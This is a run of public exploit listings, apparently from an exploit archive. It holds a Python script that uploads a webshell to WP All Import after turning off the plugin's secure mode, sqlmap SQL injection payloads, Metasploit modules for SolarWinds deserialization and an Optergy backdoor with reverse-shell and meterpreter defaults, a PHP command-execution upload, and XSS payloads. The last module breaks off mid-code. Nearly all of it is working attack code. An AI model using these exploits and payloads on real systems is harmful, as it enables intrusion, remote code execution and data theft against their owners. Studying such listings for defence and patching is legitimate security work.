<pre><code># Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 11/05/2022<br /># Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)<br /># Vendor Homepage: https://www.wpallimport.com/<br /># Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version)<br /># Version: <= 3.6.7 (tested: 3.6.7)<br /># Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload)<br /># CVE: CVE-2022-1565<br /><br />#!/usr/bin/python<br />import requests<br />import re<br />import os<br /><br /># WARNING: This exploit does NOT include the payload.<br /># Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work.<br /># If a file with the same name as the payload is already on the server, the upload will OVERWRITE it<br /># <br /># Please notice that I'm NOT the researcher who found this vulnerability<br /><br /># # # # # VULNERABILITY DESCRIPTION # # # # #<br /># The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. <br /># This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible. <br /><br /># # # # # HOW THE EXPLOIT WORKS # # # # #<br /># 1. Prepare the zip file:<br /># - create a PHP file with your payload (e.g. rerverse shell)<br /># - set the variable "payload_file_name" with the name of this file (e.g. "shell.php")<br /># - create a zip file with the payload<br /># - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip")<br />#<br /># 2. Login using an administrator account:<br /># - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /)<br /># - set the variable "admin_user" with the username of an administrator account<br /># - set the variable "admin_pass" with the password of an administrator account<br />#<br /># 3. Get the wpnonce using the get_wpnonce_upload_file() method<br /># - there are actually 2 types of wpnonce:<br /># - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class.<br /># This wpnonce allows us to change the plugin settings (check the step 4)<br /># - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class.<br /># This wpnonce allows us to upload the file<br /># <br /># 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class<br /># - if the Secure Mode is enabled, the zip content will be put in a folder with a random name.<br /># The exploit will disable the Secure Mode.<br /># By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url).<br /># The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str)<br /># - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode.<br />#<br /># 5. Upload the file using the upload_file(wpnonce_upload_file: str) method<br /># - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully.<br /># The response will contain a JSON that looks like this:<br /># {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"}<br /># As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed<br />#<br /># 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method<br />#<br /># 7. Activate the payload using the activate_payload() method<br /># - you can define a method to activate the payload.<br /># There reason behind this choice is that this exploit does NOT provide any payload.<br /># Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters<br /><br /># # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # #<br /># According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page"<br /># I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?)<br /># I had to find a workaround and so I did, by exploiting this option.<br /># WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7<br /><br /># # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # #<br /># In order for the exploit to work please consider the following:<br /># 1. check the target_url and the admin credentials<br /># 2. check the path of the zip file and the name of the payload (they can be different)<br /># 3. if you're testing locally, try to set verify_ssl_certificate on False<br /># 4. you can use print_response(http_response) to investigate further<br /><br /># Configure the following variables:<br />target_url = "https://vulnerable.wp/wordpress" # Target base URL<br />admin_user = "admin" # Administrator username<br />admin_pass = "password" # Administrator password<br />zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g /root/shell.zip)<br />payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell)<br />verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed.<br /><br /># Do NOT change the following variables<br />wp_login_url = target_url + "/wp-login.php" # WordPress login page<br />wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings<br />payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here<br />re_enable_secure_mode = False<br />session = requests.Session()<br /><br /># This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files.<br />class PluginSetting:<br /> # Regular Expression patterns<br /> pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>'<br /> pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>'<br /> pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};'<br /> http_response: requests.Response<br /> is_secure_mode_enabled: bool<br /> wpnonce_edit_settings: str<br /> wpnonce_upload_file: str<br /><br /> def __init__(self, http_response: requests.Response):<br /> self.http_response = http_response<br /> self.check_if_secure_mode_is_enabled()<br /> self.retrieve_wpnonce_edit_settings()<br /> self.retrieve_wpnonce_upload_file()<br /><br /> def check_if_secure_mode_is_enabled(self):<br /> # To tell if the Secure Mode is enabled you can check if the checkbox with id "secure" is checked<br /> # <input type="checkbox" value="1" id="secure" name="secure" checked="checked"><br /> regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text)<br /> if not regex_search:<br /> print("Something went wrong: could not retrieve plugin settings. Are you an administrator?")<br /> # print_response(self.http_response) # for debugging<br /> exit()<br /> self.is_secure_mode_enabled = "checked" in regex_search.group()<br /> <br /> def retrieve_wpnonce_edit_settings(self):<br /> # You can find this wpnonce in the source file by searching for the following input hidden:<br /> # <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9"><br /> # 052e2438f9 would be the wpnonce for editing the settings<br /> regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text)<br /> if not regex_search:<br /> print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?")<br /> # print_response(self.http_response) # for debugging<br /> exit()<br /> <br /> self.wpnonce_edit_settings = regex_search.group(1)<br /><br /> def retrieve_wpnonce_upload_file(self):<br /> # You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b';<br /> # dee75fdb8b would be the wpnonce for the upload<br /> regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text)<br /> if not regex_search:<br /> print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable")<br /> # print_response(self.http_response) # for debugging<br /> exit()<br /> <br /> self.wpnonce_upload_file = regex_search.group(1)<br /> <br />def wp_login():<br /> global session<br /> data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 }<br /> login_cookie = { "wordpress_test_cookie" : "WP Cookie check" }<br /><br /> # allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found.<br /> # Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not<br /> print("Trying to login...")<br /> response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate)<br /><br /> if response.status_code == 302:<br /> print("Logged in successfully!")<br /> return<br /><br /> # print_response(response) # for debugging<br /> print("Login failed. If the credentials are correct, try to print the response to investigate further.")<br /> exit()<br /><br />def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response:<br /> global session<br /> if set_to_enabled:<br /> print("Enabling secure mode...")<br /> else:<br /> print("Disabling secure mode...")<br /><br /> print("Edit settings wpnonce value: " + wpnonce)<br /> data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 }<br /> response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate)<br /><br /> if response.status_code == 403:<br /> print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?")<br /> # print_response(response) # for debugging<br /> exit()<br /> return response<br /><br />def switch_back_to_secure_mode():<br /> global session<br /><br /> print("Re-enabling secure mode...")<br /> response = session.get(url=wp_all_import_page_settings)<br /> plugin_setting = PluginSetting(response)<br /><br /> if plugin_setting.is_secure_mode_enabled:<br /> print("Secure mode is already enabled")<br /> return<br /> <br /> response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings)<br /> new_plugin_setting = PluginSetting(response)<br /> if not new_plugin_setting.is_secure_mode_enabled:<br /> print("Something went wrong: secure mode has not been re-enabled")<br /> # print_response(response) # for debugging<br /> exit()<br /> print("Secure mode has been re-enabled!")<br /><br />def get_wpnonce_upload_file() -> str:<br /> global session, re_enable_secure_mode <br /> # If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload<br /> # If Secure Mode is already disabled, it just returns the wpnonce for the upload<br /><br /> print("Checking if secure mode is enabled...")<br /> response = session.get(url=wp_all_import_page_settings)<br /> plugin_setting = PluginSetting(response)<br /><br /> if not plugin_setting.is_secure_mode_enabled:<br /> re_enable_secure_mode = False<br /> print("Insecure mode is already enabled!")<br /> return plugin_setting.wpnonce_upload_file<br /><br /> print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.")<br /> response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings)<br /><br /> new_plugin_setting = PluginSetting(response)<br /><br /> if new_plugin_setting.is_secure_mode_enabled:<br /> print("Something went wrong: secure mode has not been disabled")<br /> # print_response(response) # for debugging<br /> exit()<br /> <br /> print("Secure mode has been disabled!")<br /> re_enable_secure_mode = True<br /> return new_plugin_setting.wpnonce_upload_file<br /><br />def upload_file(wpnonce_upload_file: str):<br /> global session<br /><br /> print("Uploading file...")<br /> print("Upload wpnonce value: " + wpnonce_upload_file)<br /><br /> zip_file_name = os.path.basename(zip_file_to_upload)<br /> upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file<br /> files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))}<br /> data = { "name" : zip_file_name }<br /> response = session.post(url=upload_url, files=files, data=data)<br /><br /> if response.status_code == 200:<br /> print("Server replied with HTTP 200 OK. The upload should be completed.")<br /> print("Payload should be here: " + payload_url)<br /> print("If you can't find the payload at this URL, try to print the response to investigate further")<br /> # print_response(response) # for debugging<br /> return 1<br /> else:<br /> print("Something went wrong during the upload. Try to print the response to investigate further")<br /> # print_response(response) # for debugging<br /> return 0<br /> <br />def activate_payload():<br /> global session<br /><br /> print("Activating payload...")<br /> response = session.get(url=payload_url)<br /><br /> if response.status_code != 200:<br /> print("Something went wrong: could not find payload at " + payload_url)<br /> # print_response(response) # for debugging<br /> return<br /><br />def print_response(response:requests.Response):<br /> print(response.status_code)<br /> print(response.text)<br /> <br /># Entry Point<br />def Main():<br /> print("Target: " + target_url)<br /> print("Credentials: " + admin_user + ":" + admin_pass)<br /><br /> # Do the login<br /> wp_login()<br /><br /> # Retrieve wpnonce for upload.<br /> # It disables Secure Mode if needed, then returns the wpnonce<br /> wpnonce_upload_file = get_wpnonce_upload_file()<br /><br /> # Upload the file<br /> file_uploaded = upload_file(wpnonce_upload_file)<br /><br /> # Re-enable Secure Mode if needed<br /> if re_enable_secure_mode:<br /> switch_back_to_secure_mode()<br /><br /> # Activate the payload<br /> if file_uploaded:<br /> activate_payload()<br /><br />Main()<br /> <br /></code></pre>
<pre><code># Exploit Title: Outline V1.6.0 - Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Discovery Date: 2022-11-10<br /># Vendor Homepage: https://getoutline.org/<br /># Software Link: https://getoutline.org/<br /># Tested Version: V1.6.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows 11 Enterprise<br /># Step to discover Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe<br /> Auto<br /><br />C:\>sc qc OutlineService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: OutlineService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Outline\OutlineService.exe<br /> <br />LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : OutlineService<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>systeminfo<br /><br />OS Name: Microsoft Windows 11 Enterprise<br />OS Version: 10.0.22000 N/A Build 22000<br />OS Manufacturer: Microsoft Corporation<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Human Resource Management System - SQL Injection (unauthenticated)<br /># Date: 08-11-2022<br /># Exploit Author: Matthijs van der Vaart (eMVee)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip<br /># Version: 1.0 (Monday, October 10, 2022 - 13:37)<br /># Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0<br /><br />1) Capture the login POST request with Burp Suite or OWASP ZAP<br /><br />2) Save the request as "login.req"<br /><br />3) Run sqlmap as follows: "sqlmap -r login.req"<br /><br />Example login.req<br /><br />==========<br /><br />POST /controller/login.php HTTP/1.1<br /><br />Host: target<br /><br />Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda<br /><br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br /><br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br /><br />Accept-Language: en-US,en;q=0.5<br /><br />Accept-Encoding: gzip, deflate<br /><br />Content-Type: application/x-www-form-urlencoded<br /><br />Content-Length: 66<br /><br />Origin: https://target<br /><br />Referer: https://target/index.php<https://10.0.2.15/dashboard/hrm/index.php><br /><br />Upgrade-Insecure-Requests: 1<br /><br />Sec-Fetch-Dest: document<br /><br />Sec-Fetch-Mode: navigate<br /><br />Sec-Fetch-Site: same-origin<br /><br />Sec-Fetch-User: ?1<br /><br />Te: trailers<br /><br />Connection: close<br /><br />name=admin%40gmail.com&password=password+&submit=Sign+In<br /><br /><br />=========<br /><br /><br />Output example SQL Injection unauthenticated login page<br /><br /><br />==========<br /><br />POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n<br /><br />sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests:<br /><br />---<br /><br />Parameter: password (POST)<br /><br />Type: boolean-based blind<br /><br />Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /><br />Payload: name=admin@gmail.com&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In<br /><br />Type: error-based<br /><br />Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /><br />Payload: name=admin@gmail.com&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In<br /><br />Type: time-based blind<br /><br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /><br />Payload: name=admin@gmail.com&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In<br /><br />Parameter: name (POST)<br /><br />Type: boolean-based blind<br /><br />Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /><br />Payload: name=admin@gmail.com' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In<br /><br />Type: error-based<br /><br />Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /><br />Payload: name=admin@gmail.com' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In<br /><br />Type: time-based blind<br /><br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /><br />Payload: name=admin@gmail.com' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In<br /><br />---<br /><br />there were multiple injection points, please select the one to use for following injections:<br /><br />[0] place: POST, parameter: name, type: Single quoted string (default)<br /><br />[1] place: POST, parameter: password, type: Single quoted string<br /><br />==========<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/proto/amqp/version_0_9_1'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> def initialize<br /> super(<br /> 'Name' => 'SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE',<br /> 'Description' => %q{<br /> The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the<br /> AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted<br /> message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.<br /> },<br /> 'Author' => [<br /> 'Justin Hong', # vulnerability research, Trend Micro<br /> 'Lucas Miller', # vulnerability research, Trend Micro<br /> 'Piotr Bazydło', # vulnerability discovery, reported to ZDI<br /> 'Spencer McIntyre' # metasploit module<br /> ],<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => 'win',<br /> 'References' => [<br /> [ 'CVE', '2022-38108' ],<br /> [ 'URL', 'https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor' ],<br /> [ 'URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108' ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 10<br /> },<br /> 'Targets' => [<br /> [ 'Automatic', {} ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2022-10-19',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /><br /> register_options([<br /> Opt::RHOST,<br /> Opt::RPORT(5671),<br /> OptString.new('USERNAME', [true, 'The username to authenticate with', 'orion']),<br /> OptString.new('PASSWORD', [true, 'The password to authenticate with', ''])<br /> ])<br /><br /> register_advanced_options(<br /> [<br /> OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]),<br /> Opt::SSLVersion<br /> ]<br /> )<br /> end<br /><br /> def peer<br /> rhost = datastore['RHOST']<br /> rport = datastore['RPORT']<br /> if Rex::Socket.is_ipv6?(rhost)<br /> "[#{rhost}]:#{rport}"<br /> else<br /> "#{rhost}:#{rport}"<br /> end<br /> end<br /><br /> def print_status(msg)<br /> msg = "#{peer} - #{msg}"<br /> super<br /> end<br /><br /> def exploit<br /> amqp_client = Rex::Proto::Amqp::Version091::Client.new(<br /> datastore['RHOST'],<br /> port: datastore['RPORT'],<br /> context: { 'Msf' => framework, 'MsfExploit' => self },<br /> ssl: datastore['SSL'],<br /> ssl_version: datastore['SSLVersion']<br /> )<br /><br /> unless amqp_client.login(datastore['USERNAME'], datastore['PASSWORD'])<br /> fail_with(Failure::NoAccess, "Authentication failed for user #{datastore['USERNAME']}.")<br /> end<br /> print_status('Successfully connected to the remote server.')<br /><br /> channel = amqp_client.channel_open<br /> vprint_status('Successfully opened a new channel.')<br /> channel.basic_publish(<br /> routing_key: 'SwisPubSub',<br /> message: ::Msf::Util::DotNetDeserialization.generate(<br /> payload.encoded,<br /> gadget_chain: :ObjectDataProvider,<br /> formatter: :JsonNetFormatter<br /> ),<br /> properties: {<br /> message_type: 'System.Windows.Data.ObjectDataProvider'<br /> }<br /> )<br /> print_status('Successfully published the message to the channel.')<br /><br /> channel.close<br /> amqp_client.connection_close<br /> rescue Rex::Proto::Amqp::Error::UnexpectedReplyError => e<br /> fail_with(Failure::UnexpectedReply, e.message)<br /> rescue Rex::Proto::Amqp::Error::AmqpError => e<br /> fail_with(Failure::Unknown, e.message)<br /> ensure<br /> amqp_client.close<br /> end<br />end<br /></code></pre>
<pre><code>## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)<br />## Author: nu11secur1ty<br />## Date: 11.03.2022<br />## Vendor: https://www.rukovoditel.net/<br />## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1<br /><br />## Description:<br />The application is vulnerable to DOM-based cross-site scripting<br />attacks. Data is read from `location.hash` and passed to<br />`jQuery.parseHTML`.<br />The attacker can use this vulnerability to create an unlimited number<br />of accounts on this system until it crashed.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```POST<br />GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;<br />cookie_test=please_accept_for_session;<br />app_login_redirect_to=module%3Ddashboard%2F<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/i1qmfk)<br /><br />## Time spent<br />`3:45`<br /><br /></code></pre>
<pre><code># Exploit Title: iBooking v1.0.8 - Arbitrary File Upload<br /># Exploit Author: d1z1n370/oPty<br /># Date: 01/11/2022<br /># Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088<br /># Tested on: Linux<br /># Version: 1.0.8<br /><br /># Exploit Description:<br />The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.<br /><br /><br /># PoC request <br /><br />POST https://localhost/dashboard/upload-new-media HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://localhost/dashboard/settings<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062<br />Content-Length: 449<br />Connection: close<br />Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c<br /><br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="_token"<br /><br />kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW<br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="is_modal"<br /><br />1<br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="file"; filename="upload.php56"<br />Content-Type: image/gif<br /><br />GIF89a;<br /><?php system($_GET['a']); phpinfo(); ?><br />-----------------------------115904534120015298741783774062--<br /><br /></code></pre>
<pre><code># Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)<br /># Date: 9 October 2022<br /># Exploit Author: Okan Kurtulus<br /># Vendor Homepage: https://reqlogic.com<br /># Version: 11.3<br /># Tested on: Linux<br /># CVE : 2022-41441<br /><br /># Proof of Concept:<br />1- Install ReQlogic v11.3<br />2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3<br />3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.<br /><br />#XSS Payload:<br /></script><script>alert(1)</script><br /><br />#Affected Prameters<br />POBatch<br />WaitDuration<br /><br />#Final URLs<br />http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3<br />http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Optergy Proton and Enterprise BMS Command Injection using a backdoor',<br /> 'Description' => %q{<br /> This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise<br /> Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.<br /> Attackers can exploit this issue by directly navigating to an undocumented backdoor script<br /> called Console.jsp in the tools directory and gain full system access.<br /> Successful exploitation results in `root` command execution using `sudo` as user `optergy`.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF Module contributor<br /> 'Gjoko Krstic <gjoko[at]applied-risk.com>' # Discovery<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2019-7276'],<br /> [ 'URL', 'https://applied-risk.com/resources/ar-2019-008' ],<br /> [ 'URL', 'https://optergy.com/products/proton/' ],<br /> [ 'URL', 'https://optergy.com/products/optergy-enterprise/' ],<br /> [ 'URL', 'https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276' ],<br /> [ 'EDB', '47641'],<br /> [ 'PACKETSTORM', '155258']<br /> ],<br /> 'DisclosureDate' => '2019-11-05',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'Payload' => { 'BadChars' => "\x20" },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64, ARCH_X86],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptBool.new('SUDO', [ true, 'Set the sudo option to get root privileges', false ])<br /> ]<br /> )<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # Step 1: get the challenge and compute the response answer for the backdoor execution<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html?get')<br /> })<br /> if res.nil? || (res.code != 200)<br /> return nil<br /> else<br /> # Get and create a challenge response<br /> res_json = res.get_json_document<br /> return nil if res_json.nil? || res_json.blank?<br /><br /> # Get the challenge<br /> challenge = res_json['response']['message']<br /> # Make SHA1 hash from received challenge<br /> h1 = Digest::SHA1.hexdigest challenge<br /> # 